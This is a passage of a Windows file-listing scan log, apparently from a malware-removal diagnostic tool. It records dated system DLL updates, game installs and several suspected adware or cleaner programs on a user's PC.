C:\WINDOWS\system32\WinTypes.dll 2016-02-10 10:16 - 2016-01-27 03:45 - 22564328 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll 2016-02-10 10:16 - 2016-01-27 03:44 - 00604928 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\cng.sys 2016-02-10 10:16 - 2016-01-27 03:44 - 00085320 _____ (Microsoft Corporation) C:\WINDOWS\system32\OpenWith.exe 2016-02-10 10:16 - 2016-01-27 03:43 - 00359776 _____ (Microsoft Corporation) C:\WINDOWS\system32\msv1_0.dll 2016-02-10 10:16 - 2016-01-27 03:37 - 00576352 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms2.sys 2016-02-10 10:16 - 2016-01-27 03:21 - 00162816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msorcl32.dll 2016-02-10 10:16 - 2016-01-27 03:15 - 00031232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ztrace_maps.dll 2016-02-10 10:16 - 2016-01-27 03:13 - 00065536 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininetlui.dll 2016-02-10 10:16 - 2016-01-27 03:12 - 00045568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jsproxy.dll 2016-02-10 10:16 - 2016-01-27 03:11 - 00118272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mtxoci.dll 2016-02-10 10:16 - 2016-01-27 03:10 - 00099840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\hlink.dll 2016-02-10 10:16 - 2016-01-27 03:08 - 00299008 _____ (Microsoft Corporation) C:\WINDOWS\system32\microsoft-windows-system-events.dll 2016-02-10 10:16 - 2016-01-27 03:08 - 00036864 _____ (Microsoft Corporation) C:\WINDOWS\system32\ztrace_maps.dll 2016-02-10 10:16 - 2016-01-27 03:07 - 00203264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iassam.dll 2016-02-10 10:16 - 2016-01-27 03:05 - 00069632 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininetlui.dll 2016-02-10 10:16 - 2016-01-27 03:05 - 00052224 _____ (Microsoft Corporation) C:\WINDOWS\system32\jsproxy.dll 2016-02-10 10:16 - 2016-01-27 03:04 - 00147456 _____ (Microsoft Corporation) C:\WINDOWS\system32\mtxoci.dll 2016-02-10 10:16 - 2016-01-27 03:03 - 00099328 _____ (Microsoft Corporation) C:\WINDOWS\system32\ngckeyenum.dll 2016-02-10 10:16 - 2016-01-27 03:02 - 00109056 _____ (Microsoft Corporation) C:\WINDOWS\system32\hlink.dll 2016-02-10 10:16 - 2016-01-27 03:01 - 00792064 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kerberos.dll 2016-02-10 10:16 - 2016-01-27 02:59 - 00258048 _____ (Microsoft Corporation) C:\WINDOWS\system32\iassam.dll 2016-02-10 10:16 - 2016-01-27 02:57 - 00764928 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakradiag.dll 2016-02-10 10:16 - 2016-01-27 02:55 - 03666432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll 2016-02-10 10:16 - 2016-01-27 02:52 - 00970752 _____ (Microsoft Corporation) C:\WINDOWS\system32\kerberos.dll 2016-02-10 10:16 - 2016-01-27 02:50 - 02230784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll 2016-02-10 10:16 - 2016-01-27 02:50 - 01504768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll 2016-02-10 10:16 - 2016-01-27 02:50 - 00144384 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxdav.sys 2016-02-10 10:16 - 2016-01-27 02:49 - 05662208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll 2016-02-10 10:16 - 2016-01-27 02:44 - 00063488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cfgbkend.dll 2016-02-10 10:16 - 2016-01-27 02:42 - 01387520 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsasrv.dll 2016-02-10 10:16 - 2016-01-27 02:39 - 02275328 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll 2016-02-10 10:16 - 2016-01-27 02:38 - 07835648 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll 2016-02-10 10:16 - 2016-01-27 02:38 - 01734656 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll 2016-02-10 10:16 - 2016-01-27 02:37 - 04894720 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll 2016-02-10 10:16 - 2016-01-27 02:36 - 02757120 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll 2016-02-10 10:16 - 2016-01-27 02:32 - 01087488 _____ (Microsoft Corporation) C:\WINDOWS\system32\reseteng.dll 2016-02-10 10:16 - 2016-01-27 02:31 - 00079360 _____ (Microsoft Corporation) C:\WINDOWS\system32\cfgbkend.dll 2016-02-09 21:39 - 2016-02-09 14:36 - 00048456 _____ (StdLib) C:\WINDOWS\system32\Drivers\{0da991e7-651e-44f2-a8d8-99c28d929208}Gw64.sys 2016-02-09 17:35 - 2016-02-09 17:35 - 00013200 _____ C:\Users\Maollo\Downloads\videos_carnaval.zip 2016-02-07 11:30 - 2016-02-06 08:35 - 00048456 _____ (StdLib) C:\WINDOWS\system32\Drivers\{54e9b4e5-84c4-42a5-a254-fd1f8319fc98}Gw64.sys 2016-02-05 22:42 - 2016-02-05 14:35 - 00048456 _____ (StdLib) C:\WINDOWS\system32\Drivers\{5e399338-5cac-41fc-91a7-455ee6632d3f}Gw64.sys 2016-02-05 22:40 - 2016-02-11 11:21 - 00000000 ____D C:\Program Files (x86)\Primary Color 2016-02-05 22:38 - 2016-02-05 22:39 - 00000000 ____D C:\Users\Todos os Usuários\04200 2016-02-05 22:38 - 2016-02-05 22:39 - 00000000 ____D C:\Users\Todos os Usuários\02109 2016-02-05 22:38 - 2016-02-05 22:39 - 00000000 ____D C:\ProgramData\04200 2016-02-05 22:38 - 2016-02-05 22:39 - 00000000 ____D C:\ProgramData\02109 2016-02-05 22:36 - 2016-02-05 22:36 - 00232004 _____ C:\WINDOWS\Minidump\020516-17671-01.dmp 2016-02-04 10:51 - 2016-02-05 16:51 - 00000000 ____D C:\Users\Maollo\AppData\Local\WebBar 2016-02-03 22:15 - 2016-02-03 22:15 - 00000000 ____D C:\Program Files (x86)\Professional Cleaning Software 2016-02-03 22:12 - 2016-02-03 22:12 - 00631808 _____ C:\WINDOWS\nci.dat 2016-02-03 22:12 - 2016-02-03 22:12 - 00408576 _____ C:\WINDOWS\mnci.exe 2016-02-03 22:11 - 2016-02-03 22:12 - 00417792 _____ C:\WINDOWS\nci.exe 2016-02-03 22:11 - 2016-02-03 22:11 - 00000000 ____D C:\Program Files (x86)\RinoReader 2016-02-03 22:09 - 2016-02-03 22:09 - 00000000 ____D C:\Users\Todos os Usuários\05364 2016-02-03 22:09 - 2016-02-03 22:09 - 00000000 ____D C:\ProgramData\05364 2016-02-01 16:31 - 2016-02-01 16:31 - 00000000 ____H C:\WINDOWS\system32\Drivers\Msft_User_WpdFs_01_11_00.Wdf 2016-02-01 11:02 - 2016-02-01 11:02 - 00003808 _____ C:\WINDOWS\System32\Tasks\Overwolf Updater Task 2016-02-01 11:02 - 2016-02-01 11:02 - 00000000 ____D C:\Users\Maollo\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Overwolf 2016-02-01 11:02 - 2016-02-01 11:02 - 00000000 ____D C:\Users\Maollo\AppData\Local\CEF 2016-02-01 11:01 - 2016-02-01 11:02 - 00000000 ____D C:\Users\Todos os Usuários\Overwolf 2016-02-01 11:01 - 2016-02-01 11:02 - 00000000 ____D C:\ProgramData\Overwolf 2016-02-01 11:01 - 2016-02-01 11:02 - 00000000 ____D C:\Program Files (x86)\Overwolf 2016-02-01 10:59 - 2016-02-04 12:25 - 00000000 ____D C:\Users\Maollo\AppData\Roaming\TS3Client 2016-02-01 10:59 - 2016-02-01 13:29 - 00000000 ____D C:\Users\Maollo\AppData\Local\Overwolf 2016-02-01 10:59 - 2016-02-01 10:59 - 00000621 _____ C:\Users\Public\Desktop\TeamSpeak 3 Client.lnk 2016-02-01 10:59 - 2016-02-01 10:59 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TeamSpeak 3 Client 2016-02-01 10:46 - 2016-02-01 10:55 - 31017664 _____ (TeamSpeak Systems GmbH) C:\Users\Maollo\Downloads\TeamSpeak3-Client-win64-3.0.18.2.exe 2016-01-30 18:25 - 2016-01-30 18:46 - 00000000 ____D C:\Users\Maollo\AppData\Roaming\.minecraft 2016-01-30 18:24 - 2016-01-31 10:56 - 00000000 ____D C:\Users\Maollo\Desktop\Windows 2016-01-30 18:23 - 2016-01-30 18:24 - 05468254 _____ C:\Users\Maollo\Downloads\KeiNett.Launcher.Novo.rar 2016-01-30 18:18 - 2016-01-30 18:20 - 00000356 _____ C:\Users\Maollo\Documents\launcher_profiles.json 2016-01-30 18:18 - 2016-01-30 18:20 - 00000000 ____D C:\Users\Maollo\Documents\versions 2016-01-30 18:18 - 2016-01-30 18:20 - 00000000 ____D C:\Users\Maollo\Documents\libraries 2016-01-30 18:11 - 2016-01-30 18:11 - 00097888 _____ (Oracle Corporation) C:\WINDOWS\SysWOW64\WindowsAccessBridge-32.dll 2016-01-30 18:11 - 2016-01-30 18:11 - 00000000 ____D C:\Users\Maollo\minecraft 2016-01-30 18:11 - 2016-01-30 18:11 - 00000000 ____D C:\Users\Maollo\AppData\Roaming\Sun 2016-01-30 18:11 - 2016-01-30 18:11 - 00000000 ____D C:\Users\Maollo\AppData\LocalLow\Sun 2016-01-30 18:11 - 2016-01-30 18:11 - 00000000 ____D C:\Users\Maollo\.oracle_jre_usage 2016-01-30 18:11 - 2016-01-30 18:11 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java 2016-01-30 18:10 - 2016-01-30 18:11 - 00000000 ____D C:\Users\Todos os Usuários\Oracle 2016-01-30 18:10 - 2016-01-30 18:11 - 00000000 ____D C:\ProgramData\Oracle 2016-01-30 18:10 - 2016-01-30 18:10 - 00000000 ____D C:\Program Files (x86)\Java 2016-01-30 18:08 - 2016-01-30 18:08 - 00643168 _____ (Oracle Corporation) C:\Users\Maollo\Downloads\JavaSetup8u71.exe 2016-01-30 18:08 - 2016-01-30 18:08 - 00000000 ____D C:\Users\Maollo\AppData\LocalLow\Oracle 2016-01-29 18:53 - 2016-01-29 18:53 - 00000000 ____D C:\Users\Todos os Usuários\30689 2016-01-29 18:53 - 2016-01-29 18:53 - 00000000 ____D C:\ProgramData\30689 2016-01-29 18:50 - 2016-01-29 18:50 - 00262144 ____N C:\WINDOWS\Minidump\012916-26171-01.dmp 2016-01-29 16:49 - 2016-02-03 22:18 - 00000000 ____D C:\ProfessionalCleaningSoftware 2016-01-29 16:49 - 2016-01-29 16:49 - 00000000 ____D C:\Program Files (x86)\Pro PC Cleaner 2016-01-29 16:45 - 2016-01-29 16:45 - 00000000 ____D C:\Users\Todos os Usuários\22090 2016-01-29 16:45 - 2016-01-29 16:45 - 00000000 ____D C:\ProgramData\22090 2016-01-29 16:41 - 2016-02-05 22:36 - 431248031 _____ C:\WINDOWS\MEMORY.DMP 2016-01-29 16:41 - 2016-01-29 16:43 - 00294756 _____ C:\WINDOWS\Minidump\012916-25609-01.dmp 2016-01-28 17:49 - 2016-01-28 08:31 - 00048456 _____ (StdLib) C:\WINDOWS\system32\Drivers\{14399205-100e-435b-93e2-9f4ebefe8918}Gw64.sys 2016-01-28 17:48 - 2016-02-11 10:21 - 00001798 _____ C:\Users\Public\Desktop\MPC Cleaner.lnk 2016-01-28 17:48 - 2016-01-28 17:49 - 00000000 ____D C:\Users\Todos os Usuários\24912 2016-01-28 17:48 - 2016-01-28 17:49 - 00000000 ____D C:\ProgramData\24912 2016-01-28 17:48 - 2016-01-28 17:48 - 00000000 ____D C:\Users\Todos os Usuários\00509 2016-01-28 17:48 - 2016-01-28 17:48 - 00000000 ____D C:\ProgramData\00509 2016-01-28 17:47 - 2016-01-28 17:47 - 00000000 ____D C:\Users\Todos os Usuários\27756 2016-01-28 17:47 - 2016-01-28 17:47 - 00000000 ____D C:\Users\Todos os Usuários\25142 2016-01-28 17:47 - 2016-01-28 17:47 - 00000000 ____D C:\ProgramData\27756 2016-01-28 17:47 - 2016-01-28 17:47 - 00000000 ____D C:\ProgramData\25142 2016-01-28 17:45 - 2016-01-28 17:45 - 00000282 _____ C:\WINDOWS\Tasks\Launch 4540.job 2016-01-28 17:41 - 2016-01-28 17:41 - 00000000 ____D C:\Users\Todos os Usuários\26522 2016-01-28 17:41 - 2016-01-28 17:41 - 00000000 ____D C:\Users\Todos os Usuários\21817 2016-01-28 17:41 - 2016-01-28 17:41 - 00000000 ____D C:\Users\Todos os Usuários\18388 2016-01-28 17:41 - 2016-01-28 17:41 - 00000000 ____D C:\ProgramData\26522 2016-01-28 17:41 - 2016-01-28 17:41 - 00000000 ____D C:\ProgramData\21817 2016-01-28 17:41 - 2016-01-28 17:41 - 00000000 ____D C:\ProgramData\18388 2016-01-28 17:40 - 2016-01-28 17:41 - 00000000 ____D C:\Users\Todos os Usuários\31750 2016-01-28 17:40 - 2016-01-28 17:41 - 00000000 ____D C:\ProgramData\31750 2016-01-28 13:22 - 2016-01-16 04:23 - 08728920 _____ (Microsoft Corp.) C:\WINDOWS\system32\Windows.Media.Protection.PlayReady.dll 2016-01-28 13:22 - 2016-01-16 04:20 - 06971752 _____ (Microsoft Corp.) C:\WINDOWS\SysWOW64\Windows.Media.Protection.PlayReady.dll 2016-01-28 13:21 - 2016-01-16 04:21 - 01750440 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpcMon.exe 2016-01-28 13:21 - 2016-01-16 03:45 - 16986112 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.dll 2016-01-28 13:21 - 2016-01-16 03:38 - 07979008 _____ (Microsoft Corporation) C:\WINDOWS\system32\mos.dll 2016-01-28 13:21 - 2016-01-16 03:35 - 13018624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.dll 2016-01-28 13:21 - 2016-01-16 03:30 - 01053696 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiosrv.dll 2016-01-28 13:21 - 2016-01-16 03:28 - 02624512 _____ (Microsoft Corporation) C:\WINDOWS\system32\InputService.dll 2016-01-28 13:21 - 2016-01-16 03:24 - 02057216 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlidsvc.dll 2016-01-28 13:21 - 2016-01-16 03:21 - 06297088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mos.dll 2016-01-28 13:21 - 2016-01-16 03:20 - 07199232 _____ (Microsoft Corporation) C:\WINDOWS\system32\BingMaps.dll 2016-01-28 13:21 - 2016-01-16 03:20 - 02597888 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetworkMobileSettings.dll 2016-01-28 13:21 - 2016-01-16 03:20 - 01944576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InputService.dll 2016-01-28 13:21 - 2016-01-16 03:17 - 05503488 _____ (Microsoft Corporation) C:\WINDOWS\system32\d2d1.dll 2016-01-28 13:21 - 2016-01-16 03:16 - 05202944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BingMaps.dll 2016-01-28 13:21 - 2016-01-16 03:15 - 04759040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d2d1.dll 2016-01-28 13:21 - 2016-01-16 03:14 - 01946624 _____ (Microsoft Corporation) C:\WINDOWS\system32\dwmcore.dll 2016-01-28 13:21 - 2016-01-16 03:14 - 01626624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dwmcore.dll 2016-01-28 13:20 - 2016-01-16 04:37 - 00202472 _____ (Microsoft Corporation) C:\WINDOWS\system32\wscapi.dll 2016-01-28 13:20 - 2016-01-16 04:36 - 01173344 _____ (Microsoft Corporation) C:\WINDOWS\system32\aeinv.dll 2016-01-28 13:20 - 2016-01-16 04:36 - 00713568 _____ (Microsoft Corporation) C:\WINDOWS\system32\invagent.dll 2016-01-28 13:20 - 2016-01-16 04:34 - 00513888 _____ (Microsoft Corporation) C:\WINDOWS\system32\devinv.dll 2016-01-28 13:20 - 2016-01-16 04:24 - 00538632 _____ (Microsoft Corporation) C:\WINDOWS\system32\WWanAPI.dll 2016-01-28 13:20 - 2016-01-16 04:23 - 00848160 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfsvr.dll 2016-01-28 13:20 - 2016-01-16 04:23 - 00785088 _____ (Microsoft Corporation) C:\WINDOWS\system32\evr.dll 2016-01-28 13:20 - 2016-01-16 04:23 - 00536256 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioSes.dll 2016-01-28 13:20 - 2016-01-16 04:23 - 00408120 _____ (Microsoft Corporation) C:\WINDOWS\system32\AUDIOKSE.dll 2016-01-28 13:20 - 2016-01-16 04:23 - 00369912 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiodg.exe 2016-01-28 13:20 - 2016-01-16 04:20 - 00652312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\evr.dll 2016-01-28 13:20 - 2016-01-16 04:20 - 00431240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WWanAPI.dll 2016-01-28 13:20 - 2016-01-16 04:20 - 00366224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AUDIOKSE.dll 2016-01-28 13:20 - 2016-01-16 04:19 - 00709688 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfsvr.dll 2016-01-28 13:20 - 2016-01-16 04:19 - 00405568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AudioSes.dll 2016-01-28 13:20 - 2016-01-16 04:12 - 01415200 _____ (Microsoft Corporation) C:\WINDOWS\system32\msctf.dll 2016-01-28 13:20 - 2016-01-16 04:09 - 01089880 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\http.sys 2016-01-28 13:20 - 2016-01-16 04:08 - 01174008 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msctf.dll 2016-01-28 13:20 - 2016-01-16 04:08 - 00440152 _____ (Microsoft Corporation) C:\WINDOWS\system32\services.exe 2016-01-28 13:20 - 2016-01-16 03:46 - 00067072 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\usbser.sys 2016-01-28 13:20 - 2016-01-16 03:44 - 00166400 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotification.exe 2016-01-28 13:20 - 2016-01-16 03:44 - 00017408 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasadhlp.dll 2016-01-28 13:20 - 2016-01-16 03:44 - 00013824 _____ (Microsoft Corporation) C:\WINDOWS\system32\rastlsext.dll 2016-01-28 13:20 - 2016-01-16 03:43 - 00097280 _____ (Microsoft Corporation) C:\WINDOWS\system32\winhttpcom.dll 2016-01-28 13:20 - 2016-01-16 03:42 - 00120320 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapsBtSvc.dll 2016-01-28 13:20 - 2016-01-16 03:42 - 00013824 _____ (Microsoft Corporation) C:\WINDOWS\system32\sscoreext.dll 2016-01-28 13:20 - 2016-01-16 03:41 - 00055296 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotificationUx.exe 2016-01-28 13:20 - 2016-01-16 03:40 - 00106496 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasauto.dll 2016-01-28 13:20 - 2016-01-16 03:40 - 00049152 _____ (Microsoft Corporation) C:\WINDOWS\system32\pcaui.exe 2016-01-28 13:20 - 2016-01-16 03:40 - 00019456 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasautou.exe 2016-01-28 13:20 - 2016-01-16 03:39 - 00149504 _____ (Microsoft Corporation) C:\WINDOWS\system32\FilterDS.dll 2016-01-28 13:20 - 2016-01-16 03:38 - 00406528 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusUpdateHandlers.dll 2016-01-28 13:20 - 2016-01-16 03:38 - 00193024 _____ (Microsoft Corporation) C:\WINDOWS\system32\SimCfg.dll 2016-01-28 13:20 - 2016-01-16 03:38 - 00130560 _____ (Microsoft Corporation) C:\WINDOWS\system32\winbio.dll 2016-01-28 13:20 - 2016-01-16 03:37 - 00617984 _____ (Microsoft Corporation) C:\WINDOWS\system32\StorSvc.dll 2016-01-28 13:20 - 2016-01-16 03:37 - 00274944 _____ (Microsoft Corporation) C:\WINDOWS\system32\DisplayManager.dll 2016-01-28 13:20 - 2016-01-16 03:37 - 00190464 _____ (Microsoft Corporation) C:\WINDOWS\system32\wscsvc.dll 2016-01-28 13:20 - 2016-01-16 03:37 - 00073728 _____ (Microsoft Corporation) C:\WINDOWS\system32\SMSRouter.dll 2016-01-28 13:20 - 2016-01-16 03:36 - 00638464 _____ (Microsoft Corporation) C:\WINDOWS\system32\enterprisecsps.dll 2016-01-28 13:20 - 2016-01-16 03:36 - 00475648 _____ (Microsoft Corporation) C:\WINDOWS\system32\DDDS.dll 2016-01-28 13:20 - 2016-01-16 03:36 - 00221696 _____ (Microsoft Corporation) C:\WINDOWS\system32\ie4uinit.exe 2016-01-28 13:20 - 2016-01-16 03:36 - 00160768 _____ (Microsoft Corporation) C:\WINDOWS\system32\SimAuth.dll 2016-01-28 13:20 - 2016-01-16 03:36 - 00011776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rastlsext.dll 2016-01-28 13:20 - 2016-01-16 03:35 - 00383488 _____ (Microsoft Corporation) C:\WINDOWS\system32\iedkcs32.dll 2016-01-28 13:20 - 2016-01-16 03:35 - 00013312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rasadhlp.dll 2016-01-28 13:20 - 2016-01-16 03:34 - 00610816 _____ (Microsoft Corporation) C:\WINDOWS\system32\rastls.dll 2016-01-28 13:20 - 2016-01-16 03:34 - 00590848 _____ (Microsoft Corporation) C:\WINDOWS\system32\SmsRouterSvc.dll 2016-01-28 13:20 - 2016-01-16 03:34 - 00477696 _____ (Microsoft Corporation) C:\WINDOWS\system32\srcore.dll 2016-01-28 13:20 - 2016-01-16 03:34 - 00275456 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEndpointBuilder.dll 2016-01-28 13:20 - 2016-01-16 03:34 - 00079360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winhttpcom.dll 2016-01-28 13:20 - 2016-01-16 03:33 - 00726528 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlidcli.dll 2016-01-28 13:20 - 2016-01-16 03:33 - 00574976 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Networking.UX.EapRequestHandler.dll 2016-01-28 13:20 - 2016-01-16 03:33 - 00087040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MapsBtSvc.dll 2016-01-28 13:20 - 2016-01-16 03:32 - 00621568 _____ (Microsoft Corporation) C:\WINDOWS\system32\wbiosrvc.dll 2016-01-28 13:20 - 2016-01-16 03:32 - 00041984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\pcaui.exe 2016-01-28 13:20 - 2016-01-16 03:31 - 00851456 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapsStore.dll 2016-01-28 13:20 - 2016-01-16 03:31 - 00794112 _____ (Microsoft Corporation) C:\WINDOWS\system32\winhttp.dll 2016-01-28 13:20 - 2016-01-16 03:31 - 00440320 _____ (Microsoft Corporation) C:\WINDOWS\system32\CredProvDataModel.dll 2016-01-28 13:20 - 2016-01-16 03:31 - 00343552 _____ (Microsoft Corporation) C:\WINDOWS\system32\SensorsApi.dll 2016-01-28 13:20 - 2016-01-16 03:31 - 00017408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rasautou.exe 2016-01-28 13:20 - 2016-01-16 03:30 - 02127360 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcpl.cpl 2016-01-28 13:20 - 2016-01-16 03:30 - 00784384 _____ (Microsoft Corporation) C:\WINDOWS\system32\msfeeds.dll 2016-01-28 13:20 - 2016-01-16 03:30 - 00157696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SimCfg.dll 2016-01-28 13:20 - 2016-01-16 03:30 - 00093696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winbio.dll 2016-01-28 13:20 - 2016-01-16 03:29 - 01500672 _____ (Microsoft Corporation) C:\WINDOWS\system32\RecoveryDrive.exe 2016-01-28 13:20 - 2016-01-16 03:29 - 00200704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DisplayManager.dll 2016-01-28 13:20 - 2016-01-16 03:28 - 01318912 _____ (Microsoft Corporation) C:\WINDOWS\system32\wifinetworkmanager.dll 2016-01-28 13:20 - 2016-01-16 03:28 - 00884736 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasdlg.dll 2016-01-28 13:20 - 2016-01-16 03:28 - 00129024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SimAuth.dll 2016-01-28 13:20 - 2016-01-16 03:27 - 00335872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iedkcs32.dll 2016-01-28 13:20 - 2016-01-16 03:26 - 00535040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rastls.dll 2016-01-28 13:20 - 2016-01-16 03:26 - 00345600 _____ (Microsoft Corporation) C:\WINDOWS\system32\TextInputFramework.dll 2016-01-28 13:20 - 2016-01-16 03:26 - 00260608 _____ C:\WINDOWS\system32\MTFServer.dll 2016-01-28 13:20 - 2016-01-16 03:26 - 00175616 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Core.TextInput.dll 2016-01-28 13:20 - 2016-01-16 03:25 - 00510976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wlidcli.dll 2016-01-28 13:20 - 2016-01-16 03:25 - 00457728 _____ (Microsoft Corporation) C:\WINDOWS\system32\ipnathlp.dll 2016-01-28 13:20 - 2016-01-16 03:25 - 00235008 _____ C:\WINDOWS\system32\MTF.dll 2016-01-28 13:20 - 2016-01-16 03:24 - 00613888 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winhttp.dll 2016-01-28 13:20 - 2016-01-16 03:24 - 00350720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CredProvDataModel.dll 2016-01-28 13:20 - 2016-01-16 03:24 - 00273408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SensorsApi.dll 2016-01-28 13:20 - 2016-01-16 03:23 - 02050048 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcpl.cpl 2016-01-28 13:20 - 2016-01-16 03:23 - 00687616 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msfeeds.dll 2016-01-28 13:20 - 2016-01-16 03:20 - 00799744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rasdlg.dll 2016-01-28 13:20 - 2016-01-16 03:19 - 00733184 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasapi32.dll 2016-01-28 13:20 - 2016-01-16 03:19 - 00245760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TextInputFramework.dll 2016-01-28 13:20 - 2016-01-16 03:19 - 00162816 _____ C:\WINDOWS\SysWOW64\MTF.dll 2016-01-28 13:20 - 2016-01-16 03:19 - 00133632 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Core.TextInput.dll 2016-01-28 13:20 - 2016-01-16 03:18 - 01674240 _____ (Microsoft Corporation) C:\WINDOWS\system32\quartz.dll 2016-01-28 13:20 - 2016-01-16 03:16 - 01542656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\quartz.dll 2016-01-28 13:20 - 2016-01-16 03:11 - 00653312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rasapi32.dll 2016-01-28 12:49 - 2016-01-28 12:49 - 00000000 ____D C:\Users\Maollo\Documents\League of Legends 2016-01-27 12:53 - 2016-01-27 12:53 - 00001465 _____ C:\Users\Public\Desktop\Blade & Soul.lnk 2016-01-27 12:53 - 2016-01-27 12:53 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NCSOFT 2016-01-27 12:04 - 2016-02-11 10:24 - 00004174 _____ C:\WINDOWS\System32\Tasks\User_Feed_Synchronization-{5F6AB27D-71A6-440A-90D6-915E7E844D0F} 2016-01-27 11:31 - 2016-01-27 02:33 - 00048456 _____ (StdLib) C:\WINDOWS\system32\Drivers\{10593385-12ca-4697-8245-47ada7c055d9}Gw64.sys 2016-01-27 11:27 - 2016-01-27 11:27 - 00000000 ____D C:\Users\Todos os Usuários\16157 2016-01-27 11:27 - 2016-01-27 11:27 - 00000000 ____D C:\Users\Todos os Usuários\12205 2016-01-27 11:27 - 2016-01-27 11:27 - 00000000 ____D C:\ProgramData\16157 2016-01-27 11:27 - 2016-01-27 11:27 - 00000000 ____D C:\ProgramData\12205 2016-01-27 11:26 - 2016-01-27 11:26 - 00000000 ____D C:\Users\Todos os Usuários\12957 2016-01-27 11:26 - 2016-01-27 11:26 - 00000000 ____D C:\ProgramData\12957 2016-01-27 11:25 - 2016-01-27 11:25 - 00000000 ____D C:\Users\Todos os Usuários\01393 2016-01-27 11:25 - 2016-01-27 11:25 - 00000000 ____D C:\ProgramData\01393 2016-01-27 11:20 - 2016-01-27 11:21 - 31510703 _____ C:\Users\Maollo\Downloads\20759651_46be44de5bcd01ef075c79a1628c0596594e10c1.cab 2016-01-27 11:07 - 2016-01-27 11:07 - 00000000 ____D C:\Users\Todos os Usuários\12915 2016-01-27 11:07 - 2016-01-27 11:07 - 